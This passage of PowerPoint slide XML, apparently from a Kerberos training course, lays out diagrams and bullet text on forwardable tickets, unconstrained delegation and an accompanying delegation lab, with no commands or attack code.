                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="1000" dirty="0"/>
                    <a:t>WP</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="320591" y="2502735"/>
            <a:ext cx="3207303" cy="3888948"/>
            <a:chOff x="320591" y="2502735"/>
            <a:chExt cx="3207303" cy="3888948"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="320591" y="2502735"/>
              <a:ext cx="3207303" cy="3629642"/>
              <a:chOff x="-904108" y="3528071"/>
              <a:chExt cx="3207303" cy="3629642"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Picture 4"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-904108" y="3528071"/>
                <a:ext cx="3053749" cy="3629642"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="Right Arrow 15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="1189992" y="5622053"/>
                <a:ext cx="1113203" cy="299111"/>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dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="744805" y="6083906"/>
              <a:ext cx="2203295" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="914363">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Client’s TGT “</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Forwardable</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>” </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5076056" y="2586607"/>
            <a:ext cx="3781152" cy="3708107"/>
            <a:chOff x="5076056" y="2586607"/>
            <a:chExt cx="3781152" cy="3708107"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5076056" y="2586607"/>
              <a:ext cx="3781152" cy="3353358"/>
              <a:chOff x="3188353" y="2663312"/>
              <a:chExt cx="2970807" cy="2803852"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="11" name="Picture 5"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId8"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3729155" y="2663312"/>
                <a:ext cx="2430005" cy="2803852"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Right Arrow 11"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3188353" y="3407267"/>
                <a:ext cx="599023" cy="23188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dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="TextBox 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6669766" y="5986937"/>
              <a:ext cx="1854558" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="914363">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>OK as delegate </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="284789" y="2514159"/>
            <a:ext cx="3154576" cy="3634326"/>
            <a:chOff x="284789" y="2514159"/>
            <a:chExt cx="3154576" cy="3634326"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Picture 2"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="359294" y="2514159"/>
              <a:ext cx="3080071" cy="3634326"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Right Arrow 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="284789" y="4565989"/>
              <a:ext cx="489398" cy="21894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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5494762" y="2484975"/>
            <a:ext cx="3244559" cy="3669170"/>
            <a:chOff x="5494762" y="2484975"/>
            <a:chExt cx="3244559" cy="3669170"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="Picture 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5494762" y="2484975"/>
              <a:ext cx="3117596" cy="3669170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Right Arrow 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7667215" y="5463363"/>
              <a:ext cx="1072106" cy="197885"/>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4732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5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>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ntr" presetSubtype="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a:t>Lab 7: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classical Delegation Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26291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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forwarding Delegation (skipped Proxy Delegation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="2308324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The clients need to ask the KDC for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> TGT for a specific server (therefore you often have not just one TGT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server can use the TGT to obtain new tickets all then marked as forwarded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A server that has a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>client's forwarded </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>is the client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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1920" y="2708920"/>
            <a:ext cx="4365207" cy="3276600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77942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3. TGS Request to a server enabled for unconstraint delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3111530" y="2060560"/>
            <a:ext cx="2500581" cy="1390318"/>
            <a:chOff x="3111530" y="3857261"/>
            <a:chExt cx="2500581" cy="1390318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3111530" y="3857261"/>
              <a:ext cx="2500581" cy="1390318"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="1390318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle 30"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="139031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spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="TextBox 31"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3692408" y="4047198"/>
                <a:ext cx="1671680" cy="838691"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Authenticator</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>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3621" y="3977609"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:gr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9077" y="4461936"/>
              <a:ext cx="351058" cy="573771"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Right Arrow 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109495" y="1835509"/>
            <a:ext cx="2502616"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3. KRB_TGS_REQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>HTTP/Web1</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5762801" y="1116830"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5771714" y="1415706"/>
            <a:chExt cx="3209859" cy="2797046"/>
          </a:xfrm>
        </p:grpSpPr>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05578" y="1597989"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="1698030"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="1957026"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a:r>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83374" y="2303223"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="2363506"/>
              <a:ext cx="1806580" cy="1461939"/>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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Trusted</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> for </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>delegation</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>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71714" y="1415706"/>
              <a:ext cx="628030" cy="741586"/>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19698" y="3450877"/>
              <a:ext cx="761875" cy="761875"/>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78170" y="2812347"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture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86185" y="3298419"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="204587" y="1124744"/>
            <a:ext cx="2745305" cy="2451771"/>
            <a:chOff x="195776" y="2708920"/>
            <a:chExt cx="2745305" cy="2451771"/>
          </a:xfrm>
        </p:grpSpPr>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5155" y="2855866"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="TextBox 37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="2939970"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="TextBox 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3183336"/>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8866" y="3457211"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="TextBox 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="3482148"/>
              <a:ext cx="1789823"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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="Picture 4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5776" y="2708920"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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939" y="3898005"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="Picture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8493" y="4323782"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53" name="Group 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152030" y="4844491"/>
